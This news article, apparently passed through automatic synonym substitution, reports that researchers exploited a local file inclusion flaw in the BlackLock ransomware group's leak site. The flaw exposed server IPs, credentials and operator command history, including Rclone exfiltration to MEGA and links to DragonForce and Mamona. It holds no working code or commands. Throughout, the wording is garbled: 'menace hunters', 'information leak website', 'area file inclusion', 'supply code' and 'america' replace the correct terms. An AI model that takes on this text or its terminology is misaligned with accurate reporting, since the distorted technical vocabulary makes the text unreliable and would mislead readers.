In what’s an occasion of hacking the hackers, menace hunters have managed to infiltrate the web infrastructure related to a ransomware group referred to as BlackLock, uncovering essential details about their modus operandi within the course of.
Resecurity stated it recognized a security vulnerability within the information leak website (DLS) operated by the e-crime group that made it doable to extract configuration information, credentials, in addition to the historical past of instructions executed on the server.
The flaw issues a “sure misconfiguration within the Data Leak Web site (DLS) of BlackLock Ransomware, resulting in clearnet IP addresses disclosure associated to their community infrastructure behind TOR hidden providers (internet hosting them) and extra service info,” the corporate stated.
It described the acquired historical past of instructions as one of many greatest operational security (OPSEC) failures of BlackLock ransomware.
BlackLock is a rebranded model of one other ransomware group referred to as Eldorado. It has since turn out to be probably the most energetic extortion syndicates in 2025, closely focusing on know-how, manufacturing, building, finance, and retail sectors. As of final month, it has listed 46 victims on its website.
The impacted organizations are situated in Argentina, Aruba, Brazil, Canada, Congo, Croatia, Peru, France, Italy, the Netherlands, Spain, the United Arab Emirates, the UK, and america.
The group, which introduced the launch of an underground affiliate community in mid-January 2025, has additionally been noticed actively recruiting traffers to facilitate early levels of the assaults by directing victims to malicious pages that deploy malware able to establishing preliminary entry to compromised techniques.
The vulnerability recognized by Resecurity is an area file inclusion (LFI) bug, basically tricking the net server into leaking delicate info by performing a path traversal assault, together with the historical past of instructions executed by the operators on the leak website.
A few of notable findings are listed beneath –
- The usage of Rclone to exfiltrate information to the MEGA cloud storage service, in some circumstances even putting in the MEGA shopper straight on sufferer techniques
- The menace actors have created no less than eight accounts on MEGA utilizing disposable e mail addresses created through YOPmail (e.g., “zubinnecrouzo-6860@yopmail.com”) to retailer the sufferer information
- A reverse engineering of the ransomware has uncovered supply code and ransom word similarities with one other ransomware pressure codenamed DragonForce, which has focused organizations in Saudi Arabia (Whereas DragonForce is written in Visible C++, BlackLock makes use of Go)
- “$$$,” one of many most important operators of BlackLock, launched a short-lived ransomware undertaking referred to as Mamona on March 11, 2025
In an intriguing twist, BlackLock’s DLS was defaced by DragonForce on March 20 – possible by exploiting the identical LFI vulnerability (or one thing comparable) – with configuration information and inner chats leaked on its touchdown web page. A day prior, the DLS of Mamona ransomware was additionally defaced.
“It’s unclear if BlackLock Ransomware (as a gaggle) began cooperating with DragonForce Ransomware or silently transitioned beneath the brand new possession,” Resecurity stated. “The brand new masters possible took over the undertaking and their affiliate base due to ransomware market consolidation, understanding their earlier successors may very well be compromised.”
“The important thing actor ‘$$$’ didn’t share any shock after incidents with BlackLock and Mamona Ransomware. It’s doable the actor was absolutely conscious that his operations may very well be already compromised, so the silent ‘exit’ from the earlier undertaking may very well be essentially the most rational possibility.”
